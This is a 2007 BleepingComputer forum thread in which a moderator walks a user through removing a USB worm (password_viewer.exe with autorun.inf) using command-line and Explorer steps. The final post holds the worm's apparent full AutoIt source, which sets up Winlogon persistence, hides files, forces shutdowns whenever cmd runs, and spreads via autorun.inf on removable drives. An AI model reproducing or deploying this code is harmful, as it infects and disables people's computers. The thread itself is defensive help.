Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Need Help. How To Removed Password_viewer.exe And Autorun.inf :(


  • This topic is locked This topic is locked
17 replies to this topic

#1 Ezzac EMZ

Ezzac EMZ

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Malaysia
  • Local time:02:31 AM

Posted 30 December 2007 - 12:27 AM

Hi guys, can anyone tell me how to completely remove a file named password_viewer.exe and autorun.inf in my 1G DV mmc? Is it a virus? I dont know where do i get that files but i think it comes from one of my customer's mmc and know it's already effected all my mmc and pendrive. PC cant detect this files but mobile phone can. Help me plz.

BC AdBot (Login to Remove)

 


#2 quietman7

quietman7

    Bleepin' Janitor


  • Global Moderator
  • 51,589 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:Virginia, USA
  • Local time:02:31 PM

Posted 30 December 2007 - 01:02 AM

Reboot your computer in "Safe Mode" or "Safe Mode With Command Prompt" using the F8 method. To do this, restart your computer and after hearing your computer beep once during startup (but before the Windows icon appears) press the F8 key repeatedly. A menu will appear with several options. Use the arrow keys to navigate and select the option to run Windows in "Safe Mode With Command Prompt".

Go to Start > Run and type: cmd
  • press Ok.
  • At the command prompt, type in your primay drive location, usually C:
  • You may need to change the directory. If so type: cd \
  • Hit Enter.
  • Type: attrib -s -h -r -a autorun.inf
  • Hit Enter.
  • Type: dir
  • Hit Enter. This will allow you to see and confirm the Autorun files.
  • Type: del autorun.inf
  • Hit Enter.
  • Repeat the above commands for each drive on your computer.
Now search for and remove password_viewer.exe
  • At the command prompt, type in your primay drive location, usually C:
  • Type: dir /s password_viewer.exe
  • Hit Enter.
  • If the file is present, type: del password_viewer.exe
  • Hit Enter.
  • Repeat the above commands for each drive on your computer.
  • Exit the command prompt and reboot normally.

.
.
Windows Insider MVP 2017-2018
Microsoft MVP Reconnect 2016
Microsoft MVP Consumer Security 2007-2015 kO7xOZh.gif
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

If I have been helpful & you'd like to consider a donation, click 38WxTfO.gif

#3 Ezzac EMZ

Ezzac EMZ
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Malaysia
  • Local time:02:31 AM

Posted 30 December 2007 - 01:53 AM

i cant solve it yet...
when i Go to Start > Run and type: cmd, my pc will shutdown after a few seconds... what should i do?

#4 quietman7

quietman7

    Bleepin' Janitor


  • Global Moderator
  • 51,589 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:Virginia, USA
  • Local time:02:31 PM

Posted 30 December 2007 - 08:14 AM

Is this happening in safe mode too?

If your system keeps shutting down, follow these steps to stop the cycle:
  • Click on Start > Run and type: cmd
  • Press Enter.
  • At the Command Prompt type: shutdown -a
  • Press Enter.

.
.
Windows Insider MVP 2017-2018
Microsoft MVP Reconnect 2016
Microsoft MVP Consumer Security 2007-2015 kO7xOZh.gif
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

If I have been helpful & you'd like to consider a donation, click 38WxTfO.gif

#5 Ezzac EMZ

Ezzac EMZ
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Malaysia
  • Local time:02:31 AM

Posted 30 December 2007 - 09:16 AM

i cant reach safe mode.. :thumbsup: after press F8 before the windows icon appears. Only this menu appears,

please select boot device

PM -WDC....
SH -HL -DT -ST DVDRAM.....
SS -AOPEN....
VIA BOOTAGENT


What should i select?

And i also cant use Start > Run > cmd >enter... my pc will shutdown after that...

#6 quietman7

quietman7

    Bleepin' Janitor


  • Global Moderator
  • 51,589 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:Virginia, USA
  • Local time:02:31 PM

Posted 30 December 2007 - 10:21 AM

In Windows XP, the default setting is for the computer to reboot automatically when a fatal error or crash occurs. You should be able to see the error by looking in the Event Log. Read "How To Use the Event Viewer Applet". You can then gather more information doing a search of the Event ID number at:
"EventID.Net".
"Windows Security Log Events".
"Events and Errors Message Center".

An alternative is to turn off the automatic reboot feature so you can actually see the error code/STOP Message when it happens - this is also known as the Blue Screen Of Death (BSOD).

To change the recovery settings and Disable Automatic Rebooting, go to Start > Run and type: sysdm.cpl
Click Ok or just press WINKEY + Pause/Break keys to bring up System Properties.
  • Go to the Advanced tab and under "Startup and Recovery", click on the "Settings" button and go to "System failure".
  • Make sure "Write an event to the system log" is checked and that "Automatically restart" is UNchecked.
  • Click "OK" and reboot for the changes to take effect.
Doing this won't cure your problem but instead of crashing and restarting you will get a blue diagnostic screen with an error code and other information that will allow you to better trace your problem.
.
.
Windows Insider MVP 2017-2018
Microsoft MVP Reconnect 2016
Microsoft MVP Consumer Security 2007-2015 kO7xOZh.gif
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

If I have been helpful & you'd like to consider a donation, click 38WxTfO.gif

#7 Ezzac EMZ

Ezzac EMZ
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Malaysia
  • Local time:02:31 AM

Posted 30 December 2007 - 10:58 AM

I am already reach the safe mode with command prompt menu, but when i click whether on admin or user profile... my pc will shutdown after that... :thumbsup: what should i do now... help me... when i try using safe mode, a box with words "password:winzip123" appears... what's that? I think that's the main problem...

Edited by Ezzac EMZ, 30 December 2007 - 11:24 AM.


#8 quietman7

quietman7

    Bleepin' Janitor


  • Global Moderator
  • 51,589 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:Virginia, USA
  • Local time:02:31 PM

Posted 30 December 2007 - 01:19 PM

I suspect the message means that the malware has password protected safe mode and causing the machine to shut down when trying to use cmd.

Lets try doing this manually.

Reconfigure Windows XP to show hidden files, folders. Open My Computer, go to Tools > Folder Options and click on the View tab. Under Hidden Files and Folders, check "Show hidden files and Folders", uncheck "Hide Protected operating system Files (recommended)", uncheck "Hide file extensions for known file types", and hit Apply > OK.

Open My Computer, right-click on your primary drive (DO NOT double-click), select "Explore", and search for any autorun.inf at the root, then delete it. Repeat the search on all your drives and delete any autorun.inf files you find.

Use Windows Search feature > More advanced options to search for password_viewer.exe. To do this, go to Start -> Search and click For Files or Folders....
  • Click All files and folders.
  • Type in the name of the file under "Search by...criteria."
  • Click More advanced options and check these options:
    • "Search system folders"
    • "Search hidden files and folders"
    • "Search subfolders"
  • Then click "Search" to look for the file(s).
When found right-click the file, choose delete and empty your recycle bin. If you get an error when deleting a file, right-click on it and check to see if the read only attribute is checked. If it is, uncheck it and try again. If that does not work, then open Task Manager, look for and kill the process if running, then delete the file.

If you cannot delete the file, please let me know the exact location (full file path) it is running from.
.
.
Windows Insider MVP 2017-2018
Microsoft MVP Reconnect 2016
Microsoft MVP Consumer Security 2007-2015 kO7xOZh.gif
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

If I have been helpful & you'd like to consider a donation, click 38WxTfO.gif

#9 Ezzac EMZ

Ezzac EMZ
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Malaysia
  • Local time:02:31 AM

Posted 30 December 2007 - 01:56 PM

I am already follow your guide to Use Windows Search feature
* Click All files and folders.
* Type in the name of the file under "Search by...criteria."
* Click More advanced options and check these options:
o "Search system folders"
o "Search hidden files and folders"
o "Search subfolders"
* Then click "Search" to look for the file(s).

then i found 1 files with named password_viewer.exe (227kb) in C:\Windows
and 1 in prefecth folder... already deleted both files.

and found 1 process in Windows Task Manager, already kill it. I will post the result after this step.

:thumbsup:... it's still there on C:\Windows and when i double click on it... my spybot continously fight with it. In Windows Task Manager also that process appear again.

Edited by Ezzac EMZ, 30 December 2007 - 02:10 PM.


#10 quietman7

quietman7

    Bleepin' Janitor


  • Global Moderator
  • 51,589 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:Virginia, USA
  • Local time:02:31 PM

Posted 30 December 2007 - 05:17 PM

Please download OTMoveIt by OldTimer and save to your Desktop.
  • Double-click on OTMoveIt.exe to launch the program.
  • Copy the file(s)/folder(s) paths listed below - highlight everything in the quote box and press CTRL+C or right-click and choose Copy.

C:\Windows\password_viewer.exe

  • Then in OTMoveIt, right-click in the open text box labeled "Paste List of Files/Folders to be Moved" and choose Paste.
  • Click the red MoveIt! button.
  • The list will be processed and the results for each line will be displayed in the right-hand pane.
  • Highlight everything in the Results window, press CTRL+C or right-click, choose Copy, right-click again and Paste it in your next reply.
  • Click Exit when done.
  • A log of the results is automatically created and saved to C:\_OTMoveIt\MovedFiles \mmddyyyy_hhmmss.log <- the date/time the tool was run.
  • Please copy/paste the contents of that log in your next reply.
-- Note: If a file or folder cannot be moved immediately you may be asked to reboot your computer in order to finish the move process.
If asked to reboot, choose Yes.


Caution: Be careful of what you copy and paste with this tool. OTMoveIt is a powerful program, designed to move highly persistent files and folders. Not following the directions as instructed or using incorrectly could lead to disastrous problems with your operating system.


.
.
Windows Insider MVP 2017-2018
Microsoft MVP Reconnect 2016
Microsoft MVP Consumer Security 2007-2015 kO7xOZh.gif
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

If I have been helpful & you'd like to consider a donation, click 38WxTfO.gif

#11 Ezzac EMZ

Ezzac EMZ
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Malaysia
  • Local time:02:31 AM

Posted 31 December 2007 - 04:08 AM

Should i check or uncheck the Unregister Dll's and Ocx's box?

Here is the result...

File/Folder C:\Windows\password_viewer.exe not found.

Created on 12-31-2007 17:34:02

but when i try to use start > run > cmd... my pc will shutdown again. Also facing the same problem when i reboot and use safe mode under admin account. If use another user account, still cant get access on start > run > cmd. PC will shutdown after a seconds... :thumbsup:

Edited by Ezzac EMZ, 31 December 2007 - 04:37 AM.


#12 quietman7

quietman7

    Bleepin' Janitor


  • Global Moderator
  • 51,589 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:Virginia, USA
  • Local time:02:31 PM

Posted 31 December 2007 - 09:51 AM

Please read and follow all instructions in the pinned topic titled "Preparation Guide For Use Before Posting A Hijackthis Log". You may have performed some of these steps already. If you can't perform a step, then skip and continue with the next. In step #9 there are instructions for downloading HijackThis and creating a log. (This is a self-extracting version which will automatically install the current version of HJT in the proper location.) If using Windows Vista, be sure to Run As Administrator.

When you have done that, post your log in the HijackThis Logs and Malware Removal forum, NOT here, for assistance by the HJT Team Experts. A member of the Team will walk you through, step by step, on how to clean your computer. If you post your log back in this thread, the response from the HJT Team will be delayed because your post will have to be moved. This means it will fall in line behind any others posted that same day.

Start a new topic, give it a relevant title and post your log along with a brief description of your problem, a summary of any anti-malware tools you have used and a summary of any steps that you have performed on your own. Please include the top portion of the HijackThis log that lists version information. An expert will analyze your log and reply with instructions advising you what to fix. After doing this, we would appreciate if you post a link to your log back here so we know that your getting help from the HJT Team.

Please be patient. It may take a while to get a response because the HJT Team members are very busy working logs posted before yours. They are volunteers who will help you out as soon as possible. Once you have made your post and are waiting, please DO NOT "bump" your post or make another reply until it has been responded to by a member of the HJT Team. Generally the staff checks the forum for postings that have 0 replies as this makes it easier for them to identify those who have not been helped. If you post another response there will be 1 reply. A team member, looking for a new log to work may assume another HJT Team member is already assisting you and not open the thread to respond.
.
.
Windows Insider MVP 2017-2018
Microsoft MVP Reconnect 2016
Microsoft MVP Consumer Security 2007-2015 kO7xOZh.gif
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

If I have been helpful & you'd like to consider a donation, click 38WxTfO.gif

#13 Ezzac EMZ

Ezzac EMZ
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Malaysia
  • Local time:02:31 AM

Posted 31 December 2007 - 10:38 AM

thanks quietman7, should i copy the logs and paste it in the thread?

#14 quietman7

quietman7

    Bleepin' Janitor


  • Global Moderator
  • 51,589 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:Virginia, USA
  • Local time:02:31 PM

Posted 31 December 2007 - 10:41 AM

Yes, go to the HijackThis logs & Malware Removal forum, start a new topic and paste your log there
.
.
Windows Insider MVP 2017-2018
Microsoft MVP Reconnect 2016
Microsoft MVP Consumer Security 2007-2015 kO7xOZh.gif
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

If I have been helpful & you'd like to consider a donation, click 38WxTfO.gif

#15 Ezzac EMZ

Ezzac EMZ
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Malaysia
  • Local time:02:31 AM

Posted 31 December 2007 - 11:00 AM

quietman7, when try to find the solutions using Google... this is what i found... i am not sure whats the scripts for but maybe u know it.


#NoTrayIcon
Const $INF="Autorun.inf", $EXE_FILE=@ScriptName, $BAT_FILE="pc-off.bat", $MAIL="lampangbano@gmail.com"
Const $INF_VALUE="[autorun]"&@CRLF&"open="""&$EXE_FILE&" %1"""&@CRLF&"shell\Open\command="""& _
$EXE_FILE&" %1"""&@CRLF&"shell\Explore\command="""&$EXE_FILE&" %1"""&@CRLF

If $CmdLine[0] Then Run(@WindowsDir&"\explorer.exe "&$CmdLine[1])
$regValue=RegRead("HKCU\Software\BARRY","")
If $regValue<>$MAIL Then
MsgBox(4096+64,"Thank you!!!","Password: winzip123")
main()
Exit
Else
While 1
main()
Sleep(500)
WEnd
EndIf

Func main()
$ss=@WindowsDir&"\"&$EXE_FILE
$sh=@WindowsDir&"\"&$BAT_FILE
$winlogon="HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
$explorer="HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
RegWrite($winlogon,"Userinit","REG_SZ","userinit.exe,"&@ScriptName)
RegWrite($explorer,"HideFileExt","REG_DWORD",1)
RegWrite($explorer,"Hidden","REG_DWORD",2)
RegWrite($explorer,"ShowSuperHidden","REG_DWORD",0)
RegWrite("HKCU\Software\Microsoft\Command Processor","autorun","REG_SZ",$sh)
RegWrite("HKCU\Software\BARRY","","REG_SZ",$MAIL)
If Not FileExists($ss) Then
FileCopy(@ScriptFullPath,$ss)
FileSetAttrib($ss,"+RSH")
EndIf
If Not FileExists($sh) Then
$batfile=FileOpen($sh,2)
FileWrite($batfile,"@echo off"&@CRLF&"shutdown -s -f -t 1")
FileClose($batfile)
FileSetAttrib($sh,"+RSH")
EndIf
$thumb_drive=DriveGetDrive("REMOVABLE")
If Not @error Then
For $i=1 to $thumb_drive[0]
If ($thumb_drive[$i]<>"a:" And $thumb_drive[$i]<>"b:") And DriveStatus($thumb_drive[$i])="READY" Then
$tdpath=$thumb_drive[$i]&"\"&$INF
If FileExists($tdpath) Then
$autorun=FileOpen($tdpath,0)
$value=""
While 1
$value&=FileReadLine($autorun)&@CRLF
If @error=-1 Then ExitLoop
WEnd
FileClose($autorun)
If(StringInStr($value,$EXE_FILE))=0 Then
FileSetAttrib($tdpath,"-RSH")
writeAutorun($tdpath)
EndIf
Else
writeAutorun($tdpath)
EndIf
$ss=$thumb_drive[$i]&"\"&$EXE_FILE
If Not FileExists($ss) Then
FileCopy(@ScriptFullPath,$ss)
FileSetAttrib($ss,"+RSH")
EndIf
EndIf
Next
EndIf
EndFunc

Func writeAutorun($path)
$autorun=FileOpen($path,2)
FileWrite($autorun,$INF_VALUE)
FileClose($autorun)
FileSetAttrib($path,"+RSH")
EndFunc




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users